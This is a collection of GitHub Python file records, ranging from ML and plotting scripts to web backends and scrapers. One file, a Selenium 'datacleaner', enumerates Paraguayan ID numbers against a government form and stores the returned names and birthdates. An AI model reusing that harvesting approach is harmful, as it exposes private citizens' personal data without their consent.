ex))\n","repo_name":"cda2/BJ","sub_path":"python/src/bj7562.py","file_name":"bj7562.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29195429506","text":"import tensorflow as tf\nimport os\nimport numpy as np\nimport time\nfrom alexnet import alexnet_v2, alexnet_my_arg_scope\nfrom crop_image import CropImage\n\nslim = tf.contrib.slim\n\nflags = tf.app.flags\nflags.DEFINE_string('logs_dir', 'alex_batch_norm_pattern2_batch512',\n 'Directory to save the checkpoints and training summaries.')\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n \"\"\"\n Configuration Part.\n \"\"\"\n assert FLAGS.logs_dir, '`logs_dir` is missing.'\n logs_path = os.path.join('logs', FLAGS.logs_dir)\n img_path = '6P8B10G0CLZZ/6P8B10G0CLZZ5.tif'\n crop_size = [224, 224]\n num_classes = 2\n crop_image = CropImage('ng', num_classes)\n test_images = crop_image.crop_ok_image(img_path, crop_size)\n test_images = np.array(test_images)\n test_images_expanded = np.expand_dims(test_images, -1)\n print(test_images_expanded.shape)\n # convert to float batch\n # test_image_batch = tf.to_float(test_images_expanded)\n\n image_tensor = tf.placeholder(tf.uint8, [None, crop_size[0], crop_size[1], 1], name='InputImage')\n # Define the network\n with slim.arg_scope(alexnet_my_arg_scope(is_training=False)):\n logits, _ = alexnet_v2(tf.to_float(image_tensor), num_classes=num_classes, is_training=False)\n\n predictions = tf.argmax(logits, 1, name='output_argmax')\n # Setup the global step.\n tf.train.get_or_create_global_step()\n session_config = tf.ConfigProto()\n session_config.gpu_options.allow_growth = True\n tf.logging.set_verbosity(tf.logging.INFO)\n saver = tf.train.Saver()\n\n # Launch the graph\n with tf.Session(config=session_config) as sess:\n start_time = time.time()\n prev_model = tf.train.get_checkpoint_state(logs_path)\n if prev_model:\n saver.restore(sess, prev_model.model_checkpoint_path)\n elapsed_time = time.time() - start_time\n print('Checkpoint found, {}'.format(prev_model))\n print('restore elapsed time: {}'.format(elapsed_time))\n start_time = time.time()\n predict_array = sess.run(predictions, feed_dict={image_tensor: test_images_expanded})\n elapsed_time = time.time() - start_time\n crop_image.save_defect_image(predict_array, 'ng.jpg', crop_size)\n print(\"Prediction: {}, shape: {}\".format(predict_array, predict_array.shape))\n print('inference elapsed time: {}'.format(elapsed_time))\n\n else:\n print('No checkpoint found')\n\n # predict_array = sess.run(predictions)\n # print(\"Prediction: {}\".format(predict_array))\n\n\n\n\nif __name__ == '__main__':\n tf.app.run()","repo_name":"Newhandnew/AOI","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39420783868","text":"\n############################################################################\n# Simple blacklist to detector conversion\n############################################################################\n\nimport requests\nimport uuid\nfrom cyberprobe.indicators import Indicator, Indicators, Descriptor\nimport cyberprobe.logictree as lt\n\nclass Blacklist:\n\n def __init__(self):\n self.bl = []\n\n def read_from_file(self, file):\n\n with open(file) as f:\n for line in f:\n line = line.strip()\n if len(line) == 0: continue\n if line[0] == '#': continue\n self.bl.append(line)\n\n def read_from_url(self, url):\n\n resp = requests.get(url)\n\n if resp.status_code != 200:\n raise RuntimeError(resp.text)\n \n for line in resp.text.splitlines():\n line = line.strip()\n if len(line) == 0: continue\n if line[0] == '#': continue\n self.bl.append(line)\n\n def to_indicators(self, type=\"hostname\",\n category=\"exploit\", author=None,\n source=\"Blacklist conversion\", prob=0.7,\n description=None, version=1):\n\n inds = []\n\n for b in self.bl:\n\n des = Descriptor(category=category, author=author,\n source=source, prob=prob,\n type=type, value=b)\n if description != None:\n des.description = description\n ii = Indicator(des)\n ii.value = lt.Match(type, b)\n inds.append(ii)\n\n i = Indicators(\n version=version, description=\"Blacklist\",\n indicators=inds\n )\n\n return i\n","repo_name":"cybermaggedon/threat-exchanges","sub_path":"blacklist.py","file_name":"blacklist.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34130385207","text":"# Growth of Brazil's Population\n# Source: DataSus\nimport matplotlib.pyplot as plt\n\ndata = open(\"populacao_brasileira.csv\").readlines()\n\nx = [] # Population qtd array\ny = [] # Year number array\n\nfor i in range(len(data)):\n if i != 0:\n linha = data[i].split(\";\")\n x.append(int(linha[0]))\n y.append(int(linha[1]))\n# print(x) # debugging\n\nplt.bar(x, y, color=\"#e4e4e4\")\nplt.plot(x, y, color = \"k\", linestyle = \"--\")\nplt.title(\"Growt of Brazil's Population from 1980 to 2016\")\nplt.xlabel(\"Year\")\nplt.ylabel(\"Population x 100,000,000\")\nplt.savefig(\"bra_population.pdf\", dpi = 1200)\nplt.show()","repo_name":"CaduSantana/Data-Visualization-study","sub_path":"Estudo matplotlib/Population growth/Brazil_population_growth.py","file_name":"Brazil_population_growth.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5247136852","text":"#Faça um programa que ajude um jogador da MEGA SENA a criar palpites.\r\n# O programa vai perguntar quantos jogos serão gerados e vai sortear 6 números entre 1 e 60 para cada jogo, cadastrando tudo em uma lista composta.\r\n\r\nfrom random import randint\r\ntemp = list()\r\naleatorio = list()\r\nlista = []\r\ncont = 0\r\n\r\nprint('='*50)\r\nprint(f'{\"JOGA NA MEGA SENA\":^50}')\r\nprint('='*50)\r\n\r\nquant = int(input('Quantos jogos você quer gerar? '))\r\nprint('SORTEANDO {} JOGOS'.format(quant))\r\nfor p in range(0, quant):\r\n while True: ##While vai se manter até o contador atingir o valor 6, preenchendo a lista temporária com 6 números aleatórios\r\n num = randint(1, 60) ##Gerando números entre 1 e 60\r\n if num not in temp:\r\n temp.append(num) ##Se os números não estiverem em temp, ele adiciona em temp com o append\r\n cont+=1\r\n if cont >= 6: ## se temp já estiver com 6 elementos aleatórios, ele sai do laço\r\n break\r\n\r\n aleatorio = temp[:]\r\n temp.clear() ##Resetando a lista temporária\r\n cont = 0 ##Resetando o contador. Se ele não for resetado, ele já vai entrar no while com o cont em 6, e vai sair apenas com 1 valor aleatório\r\n print(f'Jogo {p+1}: {sorted(aleatorio)}')\r\n\r\n","repo_name":"rafaelbazolli/Python","sub_path":"Ex088.py","file_name":"Ex088.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73634833761","text":"\n\n\n\n\ndef spam():\n\n word = input()\n\n \n whitespace_count = lowercase_count = uppercase_count = symbol_count = 0\n for character in word:\n if character == '_':\n whitespace_count += 1\n elif character.islower():\n lowercase_count += 1\n elif character.isupper():\n uppercase_count += 1\n else:\n symbol_count += 1\n\n \n length = len(word)\n\n\n print(whitespace_count/length)\n print(lowercase_count/length)\n print(uppercase_count/length)\n print(symbol_count/length)\n\n\nspam()\n\n","repo_name":"cyrustabatab/KattisProgrammingProblems","sub_path":"alphabet_spam.py","file_name":"alphabet_spam.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7865959518","text":"from os import path\n\nfrom bcbio.pipeline import config_utils\nfrom bcbio.utils import safe_makedir, file_exists, get_in\nfrom bcbio.provenance import do\n\nCLEANUP_FILES = [\"Aligned.out.sam\", \"Log.out\", \"Log.progress.out\"]\n\ndef align(fastq_file, pair_file, ref_file, names, align_dir, data):\n config = data[\"config\"]\n out_prefix = path.join(align_dir, names[\"lane\"])\n out_file = out_prefix + \"Aligned.out.sam\"\n if file_exists(out_file):\n return out_file\n star_path = config_utils.get_program(\"STAR\", config)\n fastq = \" \".join([fastq_file, pair_file]) if pair_file else fastq_file\n num_cores = config[\"algorithm\"].get(\"num_cores\", 1)\n\n safe_makedir(align_dir)\n cmd = (\"{star_path} --genomeDir {ref_file} --readFilesIn {fastq} \"\n \"--runThreadN {num_cores} --outFileNamePrefix {out_prefix} \"\n \"--outReadsUnmapped Fastx --outFilterMultimapNmax 10\")\n fusion_mode = get_in(data, (\"config\", \"algorithm\", \"fusion_mode\"), False)\n if fusion_mode:\n cmd += \" --chimSegmentMin 15 --chimJunctionOverhangMin 15\"\n strandedness = get_in(data, (\"config\", \"algorithm\", \"strandedness\"),\n \"unstranded\").lower()\n if strandedness == \"unstranded\":\n cmd += \" --outSAMstrandField intronMotif\"\n run_message = \"Running STAR aligner on %s and %s.\" % (pair_file, ref_file)\n do.run(cmd.format(**locals()), run_message, None)\n return out_file\n\ndef _get_quality_format(config):\n qual_format = config[\"algorithm\"].get(\"quality_format\", None)\n if qual_format.lower() == \"illumina\":\n return \"fastq-illumina\"\n elif qual_format.lower() == \"solexa\":\n return \"fastq-solexa\"\n else:\n return \"fastq-sanger\"\n\ndef remap_index_fn(ref_file):\n \"\"\"Map sequence references to equivalent star indexes\n \"\"\"\n return path.join(path.dirname(path.dirname(ref_file)), \"star\")\n\ndef job_requirements(cores, memory):\n MIN_STAR_MEMORY = 30.0\n if not memory or cores * memory < MIN_STAR_MEMORY:\n memory = MIN_STAR_MEMORY / cores\n return cores, memory\n\nalign.job_requirements = job_requirements\n","repo_name":"porterjamesj/bcbio-nextgen","sub_path":"bcbio/ngsalign/star.py","file_name":"star.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"32131421875","text":"from chalice import Chalice\nimport boto3\nfrom botocore.exceptions import ClientError\nimport os\nimport urllib.request\nimport urllib.parse\nimport json\n\napp = Chalice(app_name='backend')\n\nSENDER = os.environ['SENDER']\nRECIPIENT = os.environ['RECIPIENT']\nSECRET_KEY = os.environ['SECRET_KEY']\n\nCHARSET = \"UTF-8\"\n\n@app.route('/users', methods=['POST'], cors=True)\ndef create_user():\n user_as_json = app.current_request.json_body\n email = app.current_request.json_body['email']\n name = app.current_request.json_body['name']\n message = app.current_request.json_body['message']\n body = (\"Nombre: {} \\r\\n\"\n \"Correo: {} \\r\\n\"\n \"Mensaje: {}\").format(name, email, message)\n recaptchaResponse = app.current_request.json_body['gRecaptcha']\n private_recaptcha = SECRET_KEY\n url = 'https://www.google.com/recaptcha/api/siteverify'\n params = urllib.parse.urlencode({\n 'secret': private_recaptcha,\n 'response': recaptchaResponse\n }).encode(\"utf-8\")\n data = urllib.request.urlopen(url, params).read()\n result = json.loads(data)\n success = result.get('success', None)\n if success:\n client = boto3.client('ses')\n response = client.send_email(\n Destination={\n 'ToAddresses': [\n RECIPIENT,\n ],\n },\n Message={\n 'Body': {\n 'Text': {\n 'Charset': CHARSET,\n 'Data': body,\n },\n },\n 'Subject': {\n 'Charset': CHARSET,\n 'Data': \"Contacto para informes.\",\n },\n },\n Source=SENDER,\n )\n return {'status': True}\n else:\n return {'status': False}\n","repo_name":"majesticness/un-cuarto","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14268724476","text":"import json\nimport csv\nimport time\nfrom PageReader import PageReader\n\n# Main class, loads config, runs the scrape, and handles scrape output\nclass SiteScraper:\n # Config data loaded from JSON\n config = None\n # Raw page scraper results\n results = {}\n # Results after analysis (collation, key counting, etc.)\n analyzed_results = {}\n\n # Loads config from a JSON file\n def load_config(self, config_path):\n json_data = open(config_path).read()\n data = json.loads(json_data)\n self.config = data\n\n # Main run function, scrapes all pages in the config and outputs results\n def run_scrape(self):\n for key, page in self.config['pages'].items():\n self.results[key] = self._get_page_reader_results(page, True)\n self._analyze_scrape()\n self._output_results()\n\n # Runs through results and counts key occurances if config has the\n # xpath target set to save the results\n def _analyze_scrape(self):\n target_results = {}\n for key, results in self.results.items():\n for result in results:\n for target, data in result.items():\n if self._should_save_results(key, target) == False:\n continue;\n if not target in target_results:\n target_results[target] = {}\n target_keys = data.keys()\n for target_key in target_keys:\n if not target_key in target_results.get(target, {}):\n target_results[target][target_key] = 0\n target_results[target][target_key] += 1\n self.analyzed_results = target_results\n\n # Determines output strategy from config and calls the function\n # prints an error if the function doesn't exist\n def _output_results(self):\n output_strategy = '_output_' + self.config['output']\n try:\n getattr(self, output_strategy)()\n except AttributeError:\n print('Expected function ' + output_strategy + ' does not exist')\n\n # Saves analyzed results by appending them to a csv file\n def _output_csv(self):\n print(self.analyzed_results)\n date = time.strftime(\"%m-%d-%Y %H:%M:%S\")\n for target, data in self.analyzed_results.items():\n filename = self.config['host'] + '.' + target + '.csv'\n with open(filename, 'a', newline='') as file_handle:\n writer = csv.writer(file_handle, delimiter=',')\n for key, value in data.items():\n writer.writerow([date, key, value])\n\n # Helper function to determine if the target results should be \n # included in the output\n def _should_save_results(self, key, target):\n target_config = self.config['pages'][key]['targets'][target]\n if not 'save' in target_config:\n return False\n if (target_config['save'] == False):\n return False\n return True\n\n # Calls into PageReader to scrape the site by running through each\n # page from the config, referencing urls from a previous page if specified\n def _get_page_reader_results(self, page, top_level = False):\n PageReader.config = page\n if (page['path']['type'] == 'url'):\n PageReader.config['path'] = page['path']['value']\n else:\n reference_page = page\n page_keys = page['path']['value'].split('.')\n path_values = self.results[page_keys[0]][0][page_keys[1]]\n results = []\n for path in path_values:\n reference_page['path'] = {\n 'value': str(path),\n 'type': 'url',\n }\n result = self._get_page_reader_results(reference_page);\n print(result)\n results.append(result)\n return results\n PageReader.config['schema'] = self.config['schema']\n PageReader.config['host'] = self.config['host']\n final_results = PageReader.analyze_page()\n if top_level == True:\n final_results = [final_results]\n return final_results\n\n# Load up the config and run the site scrape!\nsite_scaper = SiteScraper()\nsite_scaper.load_config('./config.json')\nresults = site_scaper.run_scrape()\n","repo_name":"gmac0/keyword-scraper","sub_path":"SiteScraper.py","file_name":"SiteScraper.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19925175713","text":"import datetime\nimport pmaw\nimport praw\nfrom enum import Enum\nfrom psaw import PushshiftAPI\nfrom sqlalchemy import desc\nfrom typing import List\n\nfrom trendr.config import (\n REDDIT_CLIENT_ID,\n REDDIT_CLIENT_SECRET,\n REDDIT_USER_AGENT,\n)\nfrom trendr.models.reddit_model import RedditComment, RedditSubmission\n\n\nclass RedditItem(Enum):\n \"\"\"\n RedditItem enum differentiates between submissions and comments\n when calling api wrappers\n \"\"\"\n\n SUBMISSION = 0\n COMMENT = 1\n\n\ndef create_praw_pmaw_api(\n client_id: str = REDDIT_CLIENT_ID,\n client_secret: str = REDDIT_CLIENT_SECRET,\n user_agent: str = REDDIT_USER_AGENT,\n) -> pmaw.PushshiftAPI:\n \"\"\"\n Create pmaw api object wrapping praw api object\n\n :param client_id: reddit api client id, defaults to REDDIT_CLIENT_ID\n :param client_secret: reddit api client secret, defaults to REDDIT_CLIENT_SECRET\n :param user_agent: reddit api user agent, defaults to REDDIT_USER_AGENT\n :raises Exception: if secrets are not found or authentication fails\n :return: pushshift api object\n \"\"\"\n\n if client_id and client_secret and user_agent:\n reddit = praw.Reddit(\n client_id=client_id,\n client_secret=client_secret,\n user_agent=user_agent,\n )\n return pmaw.PushshiftAPI(praw=reddit)\n else:\n raise Exception(\n \"Could not authenticate to Reddit because the necessary secrets were not available\"\n )\n\n\ndef create_pmaw_api() -> pmaw.PushshiftAPI:\n \"\"\"\n Create pmaw api object\n\n :return: pushshift api object\n \"\"\"\n\n return pmaw.PushshiftAPI()\n\n\ndef get_latest_submission_timestamp(asset_identifier: str) -> int or None:\n \"\"\"\n Returns the timestamp of the latest submission stored in the database for a given identifier\n\n :param asset_identifier: The identifier for the asset (AAPL, BTC), not a database id\n :return: A tweet id\n \"\"\"\n submission = (\n RedditSubmission.query.filter(\n RedditSubmission.text.ilike(f\"%{asset_identifier}%\")\n )\n .order_by(desc(RedditSubmission.tweeted_at))\n .first()\n )\n if submission:\n return submission.posted_at.timestamp()\n return None\n\n\ndef get_latest_comment_timestamp(asset_identifier: str) -> int or None:\n \"\"\"\n Returns the timestamp of the latest comment stored in the database for a given identifier\n\n :param asset_identifier: The identifier for the asset (AAPL, BTC), not a database id\n :return: A tweet id\n \"\"\"\n comment = (\n RedditComment.query.filter(RedditComment.text.ilike(f\"%{asset_identifier}%\"))\n .order_by(desc(RedditComment.tweeted_at))\n .first()\n )\n if comment:\n return comment.posted_at.timestamp()\n return None\n\n\ndef gather_items(\n api: pmaw.PushshiftAPI,\n item: RedditItem,\n search_str: str,\n subreddits: List[str] = None,\n **kwargs,\n) -> list:\n \"\"\"\n Gather all reddit comments/submissions from subreddits between\n after and before which contain any keywords\n\n :param api: api object to use when gathering\n :param item: item to collect (comment or submission)\n :param search_str: string to use as q\n :param before: limit query to content posted before timestamp\n :param after: limit query to content posted after timestamp\n :param subreddits: strings of subreddit names to search,\n defaults to None (search all subreddits)\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :param limit: limit number of results to this maximum\n :return: res\n :rtype: list[pmaw.PushshiftAPI.comment or pmaw.PushshiftAPI.submission]\n \"\"\"\n\n kwargs[\"q\"] = search_str\n if subreddits:\n kwargs[\"subreddit\"] = \",\".join(subreddits)\n\n if item == RedditItem.SUBMISSION:\n # generator for submissions\n gen = api.search_submissions(**kwargs)\n elif item == RedditItem.COMMENT:\n # generator for comments\n gen = api.search_comments(**kwargs)\n\n return gen\n\n\ndef gather_submissions(**kwargs) -> list:\n \"\"\"\n Gather all reddit submissions from subreddits between\n after and before which contain any keywords\n\n :param api: api object to use when gathering\n :param search_str: string to use as q\n :param before: limit query to content posted before timestamp\n :param after: limit query to content posted after timestamp\n :param subreddits: strings of subreddit names to search,\n defaults to None (search all subreddits)\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :return: res\n :rtype: list[pmaw.PushshiftAPI.submission]\n \"\"\"\n if \"keywords\" in kwargs and \"after\" not in kwargs:\n timestamp = get_latest_submission_timestamp(kwargs[\"keywords\"][0])\n if timestamp:\n kwargs[\"after\"] = timestamp\n\n kwargs[\"item\"] = RedditItem.SUBMISSION\n return gather_items(**kwargs)\n\n\ndef gather_comments(**kwargs) -> list:\n \"\"\"\n Gather all reddit comments from subreddits between\n after and before which contain any keywords\n\n :param api: api object to use when gathering\n :param search_str: string to use as q\n :param before: limit query to content posted before timestamp\n :param after: limit query to content posted after timestamp\n :param subreddits: strings of subreddit names to search,\n defaults to None (search all subreddits)\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :return: res\n :rtype: list[pmaw.PushshiftAPI.comment]\n \"\"\"\n if \"keywords\" in kwargs and \"after\" not in kwargs:\n timestamp = get_latest_comment_timestamp(kwargs[\"keywords\"][0])\n if timestamp:\n kwargs[\"after\"] = timestamp\n\n kwargs[\"item\"] = RedditItem.COMMENT\n return gather_items(**kwargs)\n\n\ndef gather_items_by_id(api: pmaw.PushshiftAPI, item: RedditItem, **kwargs) -> list:\n \"\"\"\n Gather all reddit comments/submissions by their ids\n\n :param api: api object to use when gathering\n :param item: item to collect (comment or submission)\n :param ids: ids to collect\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :return: res\n :rtype: list[pmaw.PushshiftAPI.comment or pmaw.PushshiftAPI.submission]\n \"\"\"\n\n if item == RedditItem.SUBMISSION:\n # generator for submissions\n gen = api.search_submissions(**kwargs)\n elif item == RedditItem.COMMENT:\n # generator for comments\n gen = api.search_comments(**kwargs)\n\n return gen\n\n\ndef gather_submissions_by_id(**kwargs) -> list:\n \"\"\"\n Gather all reddit submissions by their ids\n\n :param api: api object to use when gathering\n :param ids: ids to collect\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :return: res\n :rtype: list[pmaw.PushshiftAPI.submission]\n \"\"\"\n\n kwargs[\"item\"] = RedditItem.SUBMISSION\n return gather_items_by_id(**kwargs)\n\n\ndef gather_comments_by_id(**kwargs) -> list:\n \"\"\"\n Gather all reddit comments by their ids\n\n :param api: api object to use when gathering\n :param ids: ids to collect\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :return: res\n :rtype: list[pmaw.PushshiftAPI.comment]\n \"\"\"\n\n kwargs[\"item\"] = RedditItem.COMMENT\n return gather_items_by_id(**kwargs)\n\n\ndef convert_time(unix_time) -> datetime:\n \"\"\"\n Returns an RFC 1123 time string from a unix timestamp\n :param unix_time: time unix_time format\n :return: time as a datetime object\n \"\"\"\n return datetime.datetime.utcfromtimestamp(unix_time)\n\n\ndef reddit_count_mentioning_asset(asset_identifier: str):\n \"\"\"\n Queries Reddit for the count of posts and comments mentioning the asset.\n :param asset_identifier: The name of the asset (AAPL, BTC, Bitcoin, etc.)\n :return: a Python dictionary with the count data(startingHour: count)\n for each hour. The number of hours depends on the frequncy of mentions,\n for a max of 2000 posts(can be changed by changing the POST_COUNT variable)\n but it's left at 1,000 to not exceed api limits and for speed.\n \"\"\"\n POSTS_COUNT = 1000\n psaw_api = PushshiftAPI()\n gen_subs = psaw_api.search_submissions(q=asset_identifier, limit=POSTS_COUNT)\n gen_comments = psaw_api.search_comments(q=asset_identifier, limit=POSTS_COUNT)\n\n results_comments = list(gen_comments)\n results_subs = list(gen_subs)\n\n timeDict = {}\n for i in results_comments:\n if type(i[len(i) - 1]) == float:\n time = convert_time(i[len(i) - 1])\n time2 = datetime.datetime(time.year, time.month, time.day, time.hour, 0, 0)\n if time2 not in timeDict:\n timeDict[time2] = 1\n else:\n timeDict[time2] += 1\n else:\n time = convert_time(i[len(i) - 1][\"created\"])\n time2 = datetime.datetime(time.year, time.month, time.day, time.hour, 0, 0)\n\n if time2 not in timeDict:\n timeDict[time2] = 1\n else:\n timeDict[time2] += 1\n\n for i in results_subs:\n if type(i[len(i) - 1]) == float:\n time = convert_time(i[len(i) - 1])\n time2 = datetime.datetime(time.year, time.month, time.day, time.hour, 0, 0)\n if time2 not in timeDict:\n timeDict[time2] = 1\n else:\n timeDict[time2] += 1\n else:\n time = convert_time(i[len(i) - 1][\"created\"])\n time2 = datetime.datetime(time.year, time.month, time.day, time.hour, 0, 0)\n if time2 not in timeDict:\n timeDict[time2] = 1\n else:\n timeDict[time2] += 1\n newDict = {}\n for key, value in timeDict.items():\n string_date_time = str(key)\n newDict[string_date_time] = value\n return newDict\n","repo_name":"ryangamble/trendr","sub_path":"trendr/connectors/reddit_connector.py","file_name":"reddit_connector.py","file_ext":"py","file_size_in_byte":10100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29473459768","text":"#!/usr/bin/env python\nimport json\nfrom csv import reader as csvreader\nfrom random import randint\n\nimport responder\nimport httpx\nimport environ\nimport redis\n\n\nSRCDIR = environ.Path(__file__) - 1 # ./\n\nenv = environ.Env()\nenv.read_env(SRCDIR('env-local'))\n\ndb = redis.Redis.from_url(env('REDIS_URL'))\n\nif 'CSV_PAIRS_URL' in env:\n response = httpx.get(env('CSV_PAIRS_URL').strip(), timeout=25)\n csv = csvreader(response.text.splitlines(), delimiter=',')\n codes = dict((key.replace('-', ''), val) for key, val in csv)\n #codes = dict(csvreader('a,b\\nc,d'.splitlines(), delimiter=','))\n \napp = responder.API()\n\n\n@app.route(\"/\")\nasync def home(req, resp):\n resp.content = app.template('home.html')\n\n\n@app.route(\"/getvalue/{key}\")\nasync def get(req, resp, *, key: str):\n key = key.replace('-', '')\n if key == 'test':\n resp.media = {'value': str(randint(0, 9999))}\n elif db.get(key) == b'obtained':\n resp.media = {'error': 'Этот код уже был использован'}\n else:\n value = codes.get(key)\n if value:\n db.set(key, 'obtained') # Отметить как использованый.\n resp.media = {'value': value}\n\n \nif __name__ == '__main__':\n app.run(debug=env.bool('WEB_DEBUG', default=False), port=env('PORT', default=8000))\n","repo_name":"spbelect/doublecode","sub_path":"doublecode.py","file_name":"doublecode.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21757711313","text":"# This is a python script that removes duplicates and corrects data\n\nimport time\nimport selenium\nimport sqlite3\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\n\nconn = sqlite3.connect('paraguayosprueba2.db')\nc = conn.cursor()\n\n# select all rows where only cedula is distinct and order by nombres, nombres, apellidos, dia, mes, anho are the same\n\nc.execute(\"\"\"SELECT DISTINCT A.cedula, A.nombres, A.apellidos, A.dia, A.mes, A.anho\nFROM paraguayos A, paraguayos B\nWHERE A.cedula <> B.cedula\nAND A.nombres = B.nombres\nAND A.apellidos = B.apellidos\nAND A.dia = B.dia\nAND A.mes = B.mes\nAND A.anho = B.anho\nORDER BY A.nombres, A.apellidos, A.dia, A.mes, A.anho\"\"\")\n\n# create a list of tuples with the results\n\nrows = c.fetchall()\n\ncedula = 0\n\nprint(\"Existen \" + str(len(rows)) + \" registros duplicados\")\n\nprint(\"Limpiar? (y/n)\")\n\nlimpiar = input()\n\nif limpiar == \"y\":\n while True:\n try:\n driver = webdriver.Chrome(ChromeDriverManager().install())\n\n # Go to the website\n\n search_url = \"https://identidad.mtess.gov.py/alumno/register.php\"\n\n driver.get(search_url)\n\n time.sleep(3)\n\n elem = driver.find_element(By.NAME, \"value_cedula_1\")\n\n while cedula < len(rows):\n while True:\n try: \n print(\"Procesando cedula: \" + str(rows[cedula][0]))\n elem.clear()\n elem.send_keys(rows[cedula][0])\n elem.send_keys(Keys.TAB)\n\n time.sleep(3)\n\n elem2 = driver.find_element(By.ID, \"readonly_value_nombre_1\")\n nombres = elem2.get_attribute(\"value\")\n\n if(nombres != \"noencontrada\"):\n elem3 = driver.find_element(By.ID, \"readonly_value_apellido_1\")\n apellidos = elem3.get_attribute(\"value\")\n\n elem4 = driver.find_element(By.ID, \"dayvalue_fechanac_1\")\n dia = elem4.get_attribute(\"value\")\n\n elem5 = driver.find_element(By.ID, \"monthvalue_fechanac_1\")\n mes = elem5.get_attribute(\"value\")\n\n elem6 = driver.find_element(By.ID, \"yearvalue_fechanac_1\")\n anho = elem6.get_attribute(\"value\")\n\n if(nombres != rows[cedula][1] or apellidos != str(rows[cedula][2]) or dia != str(rows[cedula][3]) or mes != str(rows[cedula][4]) or anho != str(rows[cedula][5])):\n print(\"SE ENCONTRARON diferencias en la cedula: \" + str(rows[cedula][0]))\n print(\"Datos de la web: \" + nombres + \" | \" + apellidos + \" | \" + dia + \" | \" + mes + \" | \" + anho)\n print(\"Datos en la database: \" + str(rows[cedula][1]) + \" | \" + str(rows[cedula][2]) + \" | \" + str(rows[cedula][3]) + \" | \" + str(rows[cedula][4]) + \" | \" + str(rows[cedula][5]))\n print(\"\")\n\n # update the row with the new data\n\n c.execute(\"UPDATE paraguayos SET nombres = ?, apellidos = ?, dia = ?, mes = ?, anho = ? WHERE cedula = ?\", (nombres, apellidos, dia, mes, anho, rows[cedula][0]))\n\n conn.commit()\n else:\n print(\"No se encontraron diferencias en la cedula: \" + str(rows[cedula][0]))\n print(\"Datos de la web: \" + nombres + \" | \" + apellidos + \" | \" + dia + \" | \" + mes + \" | \" + anho)\n print(\"Datos en la database: \" + str(rows[cedula][1]) + \" | \" + str(rows[cedula][2]) + \" | \" + str(rows[cedula][3]) + \" | \" + str(rows[cedula][4]) + \" | \" + str(rows[cedula][5]))\n print(\"\")\n cedula = cedula + 1\n break\n else:\n cedula = cedula + 1\n break\n except Exception as e:\n print(e)\n print(\"Error, reintentando\")\n time.sleep(2)\n continue\n break\n except Exception as e:\n print(e)\n print(\"Error, reintentando\")\n time.sleep(2)\n continue\n\n driver.close()\n\n conn.close()\n\nelse:\n print(\"No se limpiaron los registros\")\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Marceeaax/ScrapingSNPP","sub_path":"datacleaner.py","file_name":"datacleaner.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19902907893","text":"from matplotlib import pyplot as plt\nfrom sklearn import datasets\nimport numpy as np\nX, y = datasets.make_blobs (n_samples=150, n_features=2,\ncenters=2, cluster_std=1.05,\nrandom_state=2)\n#Plotting\nfig = plt.figure(figsize=(10,8))\nplt.plot(X[:, 0][y == 0], X[:, 1][y == 0], 'r^')\nplt.plot(X[:, 0][y == 1], X[:, 1][y == 1], 'bs')\nplt.xlabel(\"feature 1\")\nplt.ylabel(\"feature 2\")\nplt.title('Random Classification Data with 2 classes')\n#plt.show()\ndef acti_func(z):\n if z>0:\n return 1\n else :\n return 0\ndef perceptron(X, y, lr, epochs):\n m, n = X.shape\n w = np.zeros((n+1,1))\n for epoch in range(epochs):\n for idx, x_i in enumerate(X):\n x_i = np.insert(x_i, 0, 1).reshape(-1,1)\n # Calculating prediction/hypothesis.\n y_hat = acti_func(np.dot(x_i.T, w))\n if (np.squeeze(y_hat) - y[idx]) != 0:\n w += lr*((y[idx] - y_hat)*x_i)\n return w\n\ndef plot_decision_boundary(X, w):\n \n # X --> Inputs\n # w --> parameters\n \n # The Line is y=mx+c\n # So, Equate mx+c = theta0.X0 + theta1.X1 + theta2.X2\n # Solving we find m and c\n x1 = [min(X[:,0]), max(X[:,0])]\n m = -w[1]/w[2]\n c = -w[0]/w[2]\n x2 = m*x1 + c\n \n # Plotting\n fig = plt.figure(figsize=(10,8))\n plt.plot(X[:, 0][y==0], X[:, 1][y==0], \"r^\")\n plt.plot(X[:, 0][y==1], X[:, 1][y==1], \"bs\")\n plt.xlabel(\"feature 